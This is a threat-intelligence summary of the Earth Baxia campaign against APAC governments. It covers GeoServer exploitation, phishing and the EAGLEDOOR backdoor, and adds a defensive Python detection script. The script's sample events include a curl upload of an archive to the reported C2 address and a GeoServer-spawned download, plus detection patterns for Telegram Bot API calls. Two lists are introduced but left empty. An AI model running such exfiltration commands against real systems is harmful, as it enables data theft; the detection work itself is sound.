In a sophisticated campaign, threat actor Earth Baxia, likely based in China, has targeted government organizations and industries across the Asia-Pacific (APAC) region. Leveraging spear-phishing emails and exploiting a critical vulnerability in GeoServer (tracked as CVE-2024-36401), Earth Baxia has successfully infiltrated systems and deployed customized malware to exfiltrate sensitive data. The campaign, which began in July 2024, primarily targeted government, energy, and telecommunication sectors in Taiwan, Vietnam, South Korea, and the Philippines, but likely affected additional countries.
CVE-2024-36401 is a remote code execution (RCE) vulnerability found in GeoServer, an open-source server for sharing geospatial data. Earth Baxia exploited this vulnerability to download malicious components using commands like curl and scp, executing arbitrary commands and introducing malware into compromised environments. This vulnerability allowed Earth Baxia to gain initial access to target systems, marking the beginning of their attack chain.
In addition to exploiting GeoServer, Earth Baxia employed spear-phishing to further their attacks. Beginning in August 2024, victims received tailored phishing emails containing malicious attachments, such as MSC files or ZIP files, which dropped the next stage of malware. These emails were designed to bypass detection and lure victims into downloading and executing malicious files. Once opened, the files initiated the execution of obfuscated VBScript, leading to the download of additional payloads from cloud services such as Amazon Web Services (AWS).
Once inside a system, Earth Baxia deployed a customized version of Cobalt Strike, a well-known post-exploitation tool often used for command-and-control (C2) operations. The altered Cobalt Strike version used by Earth Baxia had modified internal signatures and a changed configuration structure, helping it avoid detection by traditional security tools.
Additionally, Earth Baxia introduced a new backdoor called EAGLEDOOR, which supports multiple communication protocols including DNS, HTTP, TCP, and Telegram. This backdoor enables the attackers to gather information, deliver further payloads, and maintain persistent access to compromised systems. EAGLEDOOR used techniques like DLL side-loading to execute its malicious code in memory, complicating detection and analysis.
Based on telemetry data and the use of specific tools and techniques, researchers have attributed this campaign to Earth Baxia, a China-linked advanced persistent threat (APT) group. Indicators such as the use of Cobalt Strike watermarks, infrastructure hosted on Alibaba Cloud, and malware samples submitted from China further suggest that this group operates from within the region. Earth Baxia’s previous campaigns have shown a focus on the government, energy, and telecommunications sectors, aligning with the victims identified in this campaign.
The attack chain followed by Earth Baxia in this campaign can be summarized as:
EAGLEDOOR is a backdoor that allows Earth Baxia to maintain control over compromised systems. It supports four communication methods (DNS, HTTP, TCP, and Telegram); the Telegram channel relies on the Bot API methods getFile, getUpdates, sendDocument, and sendMessage. By employing multiple protocols, EAGLEDOOR can adapt its communication to the environment, making it harder for security tools to block or detect the traffic. Earth Baxia further obscures their activity by hosting malicious files on public cloud services, allowing them to easily update payloads and avoid detection.
After compromising systems, Earth Baxia exfiltrated data using curl, sending it to servers hosted at IP addresses like 152[.]42[.]243[.]170. The stolen data was archived before exfiltration, and the exfiltration process was often disguised as legitimate traffic to evade detection. The use of cloud services and dynamic payload delivery made it difficult for defenders to trace the group’s activities.
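The three behaviours described above (a download tool spawned from the GeoServer process after CVE-2024-36401 exploitation, EAGLEDOOR's Telegram Bot API channel, and curl uploads to the reported C2 address) can each be expressed as a simple detection over endpoint and proxy telemetry. The script below is an added example written for this summary, not code from the report or from any vendor product; the event field names, the log format, the sample events and the hostnames and token in them are constructed assumptions, and the only indicator taken from the text is the defanged IP address.

```python
"""Added triage example: flag Earth Baxia-style behaviours in constructed telemetry.

Assumptions: endpoint events carry image / parent_command_line / command_line
fields and proxy events carry a url field. Nothing here is the report's own code.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


def refang(ip: str) -> str:
    """Turn a defanged indicator such as 152[.]42[.]243[.]170 into a comparable IP."""
    return ip.replace("[.]", ".")


# The only indicator quoted in the summary (refanged for comparison).
REPORTED_C2 = {refang("152[.]42[.]243[.]170")}

# Telegram Bot API methods the summary attributes to EAGLEDOOR's Telegram channel.
TELEGRAM_BOT_METHODS = {"getFile", "getUpdates", "sendDocument", "sendMessage"}

# Tools the summary says were used to pull components after GeoServer exploitation.
DOWNLOAD_TOOLS = {"curl", "scp"}

TELEGRAM_BOT_RE = re.compile(r"https?://api\.telegram\.org/bot[^/]+/(\w+)")
IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
CURL_UPLOAD_FLAGS_RE = re.compile(r"(?:^|\s)(?:-T|--upload-file|-F|--data-binary)\b")


@dataclass
class Finding:
    rule: str
    host: str
    detail: str


def check_process(event: dict) -> list[Finding]:
    """Rule 1: GeoServer's Java process spawning curl/scp (post-exploitation download).
    Rule 2: curl uploading data to the reported C2 address (exfiltration)."""
    findings: list[Finding] = []
    parent = event.get("parent_command_line", "").lower()
    image = event.get("image", "")
    cmd = event.get("command_line", "")
    if image in DOWNLOAD_TOOLS and "geoserver" in parent:
        findings.append(Finding("geoserver_spawns_downloader", event["host"], cmd))
    if image == "curl" and CURL_UPLOAD_FLAGS_RE.search(cmd):
        if any(ip in REPORTED_C2 for ip in IPV4_RE.findall(cmd)):
            findings.append(Finding("curl_upload_to_reported_c2", event["host"], cmd))
    return findings


def check_proxy(event: dict) -> list[Finding]:
    """Rule 3: a host calling the Telegram Bot API methods EAGLEDOOR uses."""
    match = TELEGRAM_BOT_RE.search(event.get("url", ""))
    if match and match.group(1) in TELEGRAM_BOT_METHODS:
        return [Finding("telegram_bot_api_from_host", event["host"], match.group(1))]
    return []


def triage(events: list[dict]) -> list[Finding]:
    """Run every rule over a list of telemetry events and collect the findings."""
    out: list[Finding] = []
    for event in events:
        if event["type"] == "process":
            out.extend(check_process(event))
        elif event["type"] == "proxy":
            out.extend(check_proxy(event))
    return out


# Constructed sample telemetry (hostnames, the 203.0.113.x address and the bot
# token are placeholders; only 152.42.243.170 comes from the summary).
SAMPLE_EVENTS = [
    {"type": "process", "host": "gis-srv-01",
     "parent_command_line": "java -jar start.jar -Dgeoserver.data.dir=/opt/geoserver/data",
     "image": "curl", "command_line": "curl -o /tmp/x http://203.0.113.10/x"},
    {"type": "process", "host": "gis-srv-01", "parent_command_line": "/bin/bash",
     "image": "curl", "command_line": "curl -T /tmp/data.zip http://152.42.243.170/upload"},
    {"type": "process", "host": "web-02", "parent_command_line": "/usr/bin/apt-get",
     "image": "curl", "command_line": "curl https://deb.debian.org/"},
    {"type": "proxy", "host": "ws-117",
     "url": "https://api.telegram.org/botPLACEHOLDER:TOKEN/getUpdates"},
    {"type": "proxy", "host": "ws-118", "url": "https://example.com/index.html"},
]


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(f"[{finding.rule}] {finding.host}: {finding.detail}")
```

The benign events (a package manager invoking curl, an ordinary web request) produce no findings, while the GeoServer-spawned download, the archive upload to the reported address, and the getUpdates poll each raise one. In a real deployment the Telegram rule is the noisiest of the three, so it is usually scoped to servers and other hosts that have no business reaching the Bot API.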
Earth Baxia primarily targeted government organizations and energy industries in the APAC region, including countries like Taiwan, Vietnam, South Korea, and the Philippines. The group’s campaigns were also detected in China, where they leveraged simplified Chinese decoy documents. Given the group’s operational focus, it is likely that the targeted sectors were of strategic importance to China’s national interests.
To defend against campaigns like the one conducted by Earth Baxia, organizations should implement a multi-layered defense strategy, including:
Earth Baxia continues to demonstrate its ability to conduct sophisticated attacks, combining spear-phishing, exploited vulnerabilities, and customized malware to infiltrate critical sectors in the APAC region. By leveraging public cloud services and multi-protocol backdoors like EAGLEDOOR, the group has shown advanced capabilities in evading detection and maintaining persistence within compromised environments. Vigilance and proactive security measures are essential to counter such threats, particularly for organizations operating in high-risk sectors.
By staying informed of these evolving tactics and employing multi-layered defense solutions, organizations can better protect themselves from supply chain attacks and advanced persistent threats (APTs) like Earth Baxia.